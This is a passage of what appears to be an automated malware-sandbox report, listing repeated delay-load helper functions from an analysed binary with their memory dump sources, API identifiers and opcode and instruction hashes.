                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: b8cd044b5e59f1792f5b88dd37c30df188ea5c2aee6b5bd73a6419666a8854e4
                          • Instruction ID: e635df854065b26f1b0ad856d743c2caa704da8e98cd2ebb200eaebfe627ff94
                          • Opcode Fuzzy Hash: b8cd044b5e59f1792f5b88dd37c30df188ea5c2aee6b5bd73a6419666a8854e4
                          • Instruction Fuzzy Hash: 86B0129626C2017C310B75147C06D37032CC4C3B10330C09BF50AD43C1D4405C091631
                          Function 0038D8AC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 9e60a39e2784d79a1a9f21baf47298eff1a08f9ac8d5cb1e6b5b0d4d34a8f2d1
                          • Instruction ID: fae447a8c6353aac665d51d7820b2e6f4cc27e2eff5f4c2eebf63e492d4c4645
                          • Opcode Fuzzy Hash: 9e60a39e2784d79a1a9f21baf47298eff1a08f9ac8d5cb1e6b5b0d4d34a8f2d1
                          • Instruction Fuzzy Hash: FFB0129A26C3027C310B71147C46D3B031CD4C3B11330805BF10AD41C1D4405C041731
                          Function 0038D891 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 0c63b322c7ce0ee99ddc865fcc71ea11c8e5b02c800166d049be14bb5c58e906
                          • Instruction ID: 42bbbc842756530251c15342ca747eb2640f86fcb5075ca12518dbac2b82e103
                          • Opcode Fuzzy Hash: 0c63b322c7ce0ee99ddc865fcc71ea11c8e5b02c800166d049be14bb5c58e906
                          • Instruction Fuzzy Hash: 88B0129A26C3017C310B31107C56C3B031CC4C2B1133085ABF10AE40C1D4405C485531
                          Function 0038D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 4d7ddfded4a350ca491eb122a1ff44fa0e0e8c6ddc5d9936c1f0fe301369cc41
                          • Instruction ID: ded986d50d5ac0e9b433c7b803e6dbcf8d47335f9b149a4890db9191d352ff75
                          • Opcode Fuzzy Hash: 4d7ddfded4a350ca491eb122a1ff44fa0e0e8c6ddc5d9936c1f0fe301369cc41
                          • Instruction Fuzzy Hash: 06B012A626C2027C310F7125BC06D37031CC4C2B10330805BF10ED41C1D4405C051631
                          Function 0038D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 068b423d5e81a5a2a945776f9ab8cb20d429efe5103116c0c19b4698843087dd
                          • Instruction ID: 5ff5bab8674d7d17c23fe79f937b69255b1b9c919993643d56ca294f364af7ba
                          • Opcode Fuzzy Hash: 068b423d5e81a5a2a945776f9ab8cb20d429efe5103116c0c19b4698843087dd
                          • Instruction Fuzzy Hash: 48B012A626C2017C310F71247D06D37031CC4C2B10330805BF10ED41C1D4405D061631
                          Function 0038D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 2b018fbb2d227dec9f09b02767941f206a75be05d5428be3553f5704498ff907
                          • Instruction ID: 1340b95a076ddbfa161635b8b330c208517795cf2b5e4e5f764fe4234296253f
                          • Opcode Fuzzy Hash: 2b018fbb2d227dec9f09b02767941f206a75be05d5428be3553f5704498ff907
                          • Instruction Fuzzy Hash: 83B012A626C3017C314B71247C06D37031CC4C2B10330815BF10ED41C1D4405C451631
                          Function 0038D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: f2137a1f4a995b07f526521980add8c69fee1f62d6ecec6138cdd14b691c0ef0
                          • Instruction ID: b25f1dde29ecd99a26a5a4bfe9f49718538aee6935ab86c128b8264e30cbcb0b
                          • Opcode Fuzzy Hash: f2137a1f4a995b07f526521980add8c69fee1f62d6ecec6138cdd14b691c0ef0
                          • Instruction Fuzzy Hash: 54B012A626C2017C310B71247C06D37031CC4C3B10330C05BF50ED41C1D4405C051631
                          Function 0038D8CA Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 2385ef7f0212fc8a4c06cb5810625051d046dbde9029bad4ac5f57b3e807f8d6
                          • Instruction ID: 7ca5bd4a119fff42f8c6feb7f820378f5a50daffecce5ba7acd1788fde50184e
                          • Opcode Fuzzy Hash: 2385ef7f0212fc8a4c06cb5810625051d046dbde9029bad4ac5f57b3e807f8d6
                          • Instruction Fuzzy Hash: E9B0129626C2017C310F75147D06D37032CC4C2B10330C09BF10AD43C1D4405C0E1631
                          Function 0038D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 317e24fd1d4399e834b6dc6287ea928a68bec4386b408609f48f4fe10895560d
                          • Instruction ID: 422f1463d1efc898426248f8db32da24a4b531fa0ae17f21a8670bae334f7067
                          • Opcode Fuzzy Hash: 317e24fd1d4399e834b6dc6287ea928a68bec4386b408609f48f4fe10895560d
                          • Instruction Fuzzy Hash: B3B0129626C3417C314B71147C06D37032CC4C2B10330C19BF10AD43C1D4405C891631
                          Function 0038D92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 3b3f0bc4906e41505ba3e470df021043b9369c12919a194b57cc00b79d4c4fa3
                          • Instruction ID: d0e689efa0c5ca4057c810bfda92a1fc1c5f24bff41cf544c2c7b74f2f2a071d
                          • Opcode Fuzzy Hash: 3b3f0bc4906e41505ba3e470df021043b9369c12919a194b57cc00b79d4c4fa3
                          • Instruction Fuzzy Hash: CBB0129626C2017C310B71247C07D37035CC8C3B10330C05BF60AD41C1D5405C041631
                          Function 0038D924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: d7e4915a331223a50464fd32ad208596003105f47f389f19c89ff26c61725beb
                          • Instruction ID: e82a56d1ec6e1ad59081e829a1031198d3606c1320845f2ae09cd6f086fd2e80
                          • Opcode Fuzzy Hash: d7e4915a331223a50464fd32ad208596003105f47f389f19c89ff26c61725beb
                          • Instruction Fuzzy Hash: 76B012A667D2027C310B71147C06D37035DC8C2B10330805BF10AD41C1D4405C041631
                          Function 0038D910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 7eb3c3019ecc56b1e664f19b43bca23135df2477e989c09b618368cdea1b7262
                          • Instruction ID: 398ef209767145f4b950032cc64642e7188335f8cb55a54b3fc35de7d37dd350
                          • Opcode Fuzzy Hash: 7eb3c3019ecc56b1e664f19b43bca23135df2477e989c09b618368cdea1b7262
                          • Instruction Fuzzy Hash: 74B012B666D3017C314B72547C06D37031DC4C2B10330815BF10AD41C1D4405C441631
                          Function 0038D906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 85c2ea72ec65ba0dbd9c981953962a8971a7363948e266a070e2503374d977d2
                          • Instruction ID: 8d1e7cf6cb4abbe5375db4954fafdf43e11c31191e86c11ec157ef5dc980da4a
                          • Opcode Fuzzy Hash: 85c2ea72ec65ba0dbd9c981953962a8971a7363948e266a070e2503374d977d2
                          • Instruction Fuzzy Hash: 47B012A666D2017C310B71147C06D37031DC4C3B10330C05BF50AD41C1D4405C041631
                          Function 0038D942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038D8A3
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 56de4bde2c724a1801f3d218e272d0a1d6d2f2b453adb849eb1d0fd31fa8ba88
                          • Instruction ID: 92f3e7521572182726319c5882c7aee7223f7a95e759dfab58751d0b9a1cc2b1
                          • Opcode Fuzzy Hash: 56de4bde2c724a1801f3d218e272d0a1d6d2f2b453adb849eb1d0fd31fa8ba88
                          • Instruction Fuzzy Hash: 7DB012A626C2017C310F71147D07D37039CC8C3B10330805BF10AD41C1D4405D051631
                          Function 0038DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                          • String ID:
                          • API String ID: 1269201914-0
                          • Opcode ID: 002acee7f2fe97a7e45add26290fb91e402b77f9642ea4476a80490319b9f382
                          • Instruction ID: 3320611e15fa9bbdfbdfde9507c78575ab5182706a66e1b8e98122b24879a73b
                          • Opcode Fuzzy Hash: 002acee7f2fe97a7e45add26290fb91e402b77f9642ea4476a80490319b9f382
                          • Instruction Fuzzy Hash: 9AB012D626C2016C310F72067C02E3F035CC0C4B10330C55BF109C41C9D4444C095631
                          Function 0038DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                          Download Yara Rule
                          APIs
                          • ___delayLoadHelper2@8.DELAYIMP ref: 0038DAB2
                            • Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
                            • Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1655576552.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true
                          • Associated: 00000000.00000002.1655563280.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655598334.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
